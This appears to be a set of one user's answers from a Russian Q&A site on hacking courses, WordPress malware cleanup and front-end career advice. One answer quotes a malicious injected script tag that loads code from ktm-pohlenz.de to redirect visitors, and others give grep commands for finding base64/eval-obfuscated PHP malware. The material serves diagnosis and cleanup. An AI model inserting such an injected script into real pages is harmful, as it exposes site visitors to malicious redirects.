Константин

Курсы. По хакингу. Для новичков.


Это абсолютно несовместимое сочетание слов!

Почитайте этот ответ и комментарии к нему. И этот ещё полезно будет.

на курсах далеко не уедешь: они рассказывают основы и давно прикрытые дыры.
для хакинга нужны не курсы, а
1 мозг (это самое ценное)
2. знание сетевых протоколов
3. знание целевой системы

остальное: совершенствование своих навыков в выше перечисленном и постоянное чтение cve и их анализ.

нет таких книг, есть wordpress codex

Обычно да. Просто переносите и импортируете.

На инженера-программиста может пойти и обладатель кулинарного средне-специального образования. Или человек вообще без средне-специального образования.

Начните с университетского курса по ИБ. Реверсинжиниринг, анализ трафика, навыки программирования, аудит инфобезопасности и анализ защищенности, системное администрирование, криптоанализ, безопасность мобильных приложений.... Вот это и есть "основа основ". Разумеется, для того, что-бы участвовать в соревнованиях к этим основам надо существенно "добавить" всякого, чего можно поверх теории освоить исключительно из практики.

rdesktop/remmina

1. Функция checkOne() достаёт ключевые слова из тега <meta name="keywords" content="..." />
2. Если ключевые слова не найдены, то скрипт берёт ключевые фразы из utm_term.
3. Если ключевые фразы из utm_term не найдены, то используется title страницы.

Найденные ключевые слова кодируются и отправляются в ktm-pohlenz.de/js/jquery.min.php. В результате вставляется JavaScript, который редиректит пользователя на URL адрес, максимально соответствующий найденным ключевым словам и HTTP referer страницы. Пример для этой страницы:

<script type="text/javascript" src="http://ktm-pohlenz.de/js/jquery.min.php?c_utt=J18171&c_utm=http%3A%2F%2Fktm…IT%26se_referrer%3Dhttps%253A%252F%252Ftoster.ru%252F%26source%3Dtoster.ru"></script>

P.S.: Редирект возвращается не всегда. Возможно на стороне ktm-pohlenz.de есть какая-то фильтрация по IP, UA, параметру c_utt и т. д.

Сам отвечаю - перестало появляется
Поискал все файлы на слово base64 заметил что в трех картинках есть это слово - удалил, перестало появлятся

слово base64 само по себе не зло, в обычном php часто встречается, но в картинках его быть не должно

теперь периодически ищю скриптом

#!/bin/bash
find . -iname '*.gif' -type f -print| xargs grep "base64" > result.txt
find . -iname '*.jpeg' -type f -print| xargs grep "base64" >> result.txt
find . -iname '*.jpg' -type f -print| xargs grep "base64" >> result.txt
find . -iname '*.htm' -type f -print| xargs grep "base64" >> result.txt
find . -iname '*.html' -type f -print| xargs grep "base64" >> result.txt
find . -type f -print| xargs grep -i "uniplacer" >> result.txt

У вас где-то залит shell-скрипт. В идеале нужно все переустановить.
Wordpress в обязательном порядке, тему и все плагины. Если на сервере под одним пользователем несколько сайтов, то такой враг может быть в любом из них.

Если у вас есть доступ к серверу по SSH, то выполните команду

find . -type f -name '*.php' | xargs grep -l "x63" --color

или

find . -type f -name '*.php' | xargs grep -l "x47" --color

"точка" после find обозначает искать в папке, в которой находитесь, замените ее на путь к папке, где лежат ваш сайт или сайты или вообще заменить на слеш / тогда искать будет по всему серверу.

Команда ищет файлы в содержании, которых есть текст "x63" или "x47". В 99% случаях из таких кодов состоит шифровка вражеских вирусов. Обратите внимание на файлы, которые найдет команда. Откройте их и посмотрите содержание. Код вируса вы сразу увидите, он весь шифрованный base64 и присутствуют команды eval. Чистите или восстановите данные файлы на чистые.

Самый простой способ - завести SSH ключ чтобы логиниться без пароля, и в пхп написать
$out = shell_exec("ssh user@host 'df -BM'");
ну и распарсить потом $out;

в пользовательском коде будет гораздо больше дыр, чем в стэке.

Что для этого нужно диктуют работодатели. Определите примерную ЗП которую хотите. Посмотрите список вакансий предлагающую её. Просмотрите их требования.

У всех работодателей разная специфика. Кто-то штампует лендинги. Тут важным критерием будет насколько быстро вы можете сверстать такой, и не очень важно какие технологии вы используете.

Кто-то выполняет разработку сайтов под ключ на WordPress. Тут вам нужно помимо помимо знаний html, css понимать как работает ВП: Какой html он генерирует при выводе меню, в каком виде он создаёт виджеты, какие теги он генерирует сам, а какие должны прописать вы. И т. д.

У кого-то может быть один крупный корпоративный сайт. Тут вам пригодятся другие навыки.

для этой сферы необходимо: html, css, botstrap. flexbox, grid, sass,javascript, jQuery, ES6, React.js, git

Еееее ... нет.

• html, css — Основные технологии для верстки.
  
• flexbox, grid — отдельные свойства стилей. Должны изучаться вместе со всем остальным css.
  
• javascript — Будет большим плюсом для верстки.
  
• ES6 — Спецификация javascript. Должна изучаться вместе со всем остальным javascript. Это если вы хотите более серьёзно расти в этом направлении.
  
• git — Будет полезен лично вам и не плохим плюсом в резюме при работе над большими проектами. При конвеерной верстке лендингов этого от вас навряд кто-то будет требовать.
  
• botstrap — Набор готовых стилей. Требуется не всегда и не везде.
  
• jQuery — Абстракция над скриптами. Требуется не всегда и не везде.
  
• sass — Препроцессор. Альтернатива css. Требуется не всегда и не везде.
  
• React.js — javascript Фреймворк. Требуется не всегда и не везде.
  

Стоит ли задумываться о платных курсах

Если видите, что того что есть в интернете вам не хватает — да. Если понимаете что без наставника у которого можна переспросить или попросить объяснить какой-то момент вы не справляетесь — да.

За сколько я могу освоить эту отрасль для того, чтобы найти работу и развиваться дальше?

Вы хоть уже можете начать поиски работы. Есть работодатели готовые нанимать новичков, за дешево и давать им базовые знания. И ставить на простые задачи.

задумалась о фрилансе

На ваше усмотрение. Но будьте готовы к большой конкуренции. С фрилансом такое дело, что вы и разработчик и менеджер по работе с клиентом. В то время как в нормальных организациях, обязанности по работе с клиентом ложатся на другого человека.

или дистанционной работе, это реально, или лучше сперва работать на компанию

Всё зависит от специфики компании. Как вам будет удобнее. Но если хотите развивать навыки коммуникации я бы не брал удалёнку.

UPD.
По личному опыту добавлю, что обучение само по себе это хорошо. Но не очень полезно. Но вот обучение в рамках решения каких-то задач — куда лучше.
Это как с советами — он должен быть к месту. Если я просто расскажу вам что есть метод Element.scrollIntoViewIfNeeded() то скорее всего вы забудете о нем через пару дней. Но вот изучив его пытаясь найти решение какой-то проблемы — запомните о нем надолго.

Так, что лучше всего найти какую-то работу и развиваться в рамках поставленных задач. Когда поймёте, что перестали расти — меняйте работу. У вас уже будет какой-то опыт и портфолио.

Так же хобби проекты — как для меня, отличный способ "прокачки". Но это только в том случае если у вас есть страсть и желание искать новые способы, технологии для развития и улучшения своего детища.